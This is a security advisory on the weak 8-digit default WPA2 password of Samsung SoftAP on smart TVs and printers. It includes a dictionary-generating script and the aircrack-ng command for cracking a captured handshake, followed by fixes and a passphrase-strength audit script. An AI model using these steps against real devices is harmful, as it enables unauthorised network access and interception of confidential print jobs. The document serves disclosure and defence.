Samsung SoftAP weak default password
Many Samsung devices have a special way to interact, called Wi-Fi Direct in
some cases and SoftAP in others. This feature is simply an access point with
an integrated DHCP server. For example, a user who wants to print a document
with this functionality just searches for the SSID of the printer, joins it
from a PC or cellphone and sends the document. Something similar happens with
a smart TV, but it shows an image or plays video or music.
The vulnerability
Let's see what a password of the SoftAP functionality looks like on a smart TV.
Here you can see the same example on a printer.
The SoftAP always uses WPA2, but if you capture a handshake using aircrack,
just by sniffing the air, it is 100% possible to crack the password in less
than 14 hours using a modern desktop computer.
So you can send content to the printer and smart TV without anything to stop
it.
This code will generate an 800 MB dictionary
dictgen.py
---------------------------------------------------------------------------
# Print every 8-digit numeric string, 00000000 through 99999999, one per line
count = 0
while count < 100000000:
    print(str(count).zfill(8))
    count = count + 1
---------------------------------------------------------------------------------
Just run this:
python dictgen.py >dictionary.txt
If you want to test it, use aircrack-ng with the previously generated
dictionary.
The syntax is the following:
aircrack-ng printer.pcap -w dictionary.txt
Now you need to wait a little more than half a day to get the password.
When it finishes you will see something like the following image.
Now you have IP connectivity with the TV or printer and the clients.
You could intercept all files in transit; in the case of printers these could
contain important information such as contracts, confidential documents, etc.
You could also play arbitrary content on the smart TV in some cases using some
DLNA/UPnP software.
Fix and workaround
Any of the following options could be used.
Option 1- Make your password stronger: It's a good idea to change the password to one that uses lowercase letters, CAPS and numbers, with 8 to 15 characters.
Option 2- Shut down the service: If you don't use this functionality, just disable it.
Option 3- Download the official patch: It depends on your model.
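To put Option 1 in numbers, the following added example (not part of the original advisory) estimates how long a chosen SoftAP passphrase would resist exhaustive search at the rate implied above, 10^8 candidates in 14 hours, and flags passphrases that still fall inside the 8-digit keyspace. The names alphabet_size and audit and the sample passphrases are assumptions made for illustration.

```python
import string

# Baseline from the page: the 10**8 eight-digit candidates are exhausted
# in about 14 hours on a modern desktop computer.
DEFAULT_KEYSPACE = 10 ** 8
BASELINE_HOURS = 14
RATE_PER_HOUR = DEFAULT_KEYSPACE / BASELINE_HOURS  # about 7.1 million/hour

CLASSES = (string.digits, string.ascii_lowercase, string.ascii_uppercase)


def alphabet_size(passphrase):
    """Size of the smallest digits/lower/upper/symbol alphabet covering it."""
    size = sum(len(c) for c in CLASSES if any(ch in c for ch in passphrase))
    if any(all(ch not in c for c in CLASSES) for ch in passphrase):
        size += len(string.punctuation) + 1  # ASCII symbols plus space
    return size


def audit(passphrase):
    """Return (keyspace, hours to exhaust it at the baseline rate,
    True if the passphrase lies inside the 8-digit default keyspace)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 characters long")
    keyspace = alphabet_size(passphrase) ** len(passphrase)
    in_default = len(passphrase) == 8 and all(
        ch in string.digits for ch in passphrase)
    return keyspace, keyspace / RATE_PER_HOUR, in_default


if __name__ == "__main__":
    # Constructed sample passphrases, not taken from any real device.
    for sample in ("48213907", "qmxkzpvt", "Tv7kQm2xLp"):
        keyspace, hours, in_default = audit(sample)
        years = hours / (24 * 365)
        flag = "inside default keyspace" if in_default else "outside it"
        print(f"{sample!r}: {keyspace:.3e} candidates, "
              f"{years:,.2f} years at the baseline rate, {flag}")
```

The estimate covers exhaustive search only; a passphrase built from dictionary words falls much sooner than its length suggests.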
Vulnerable models
SmartTVs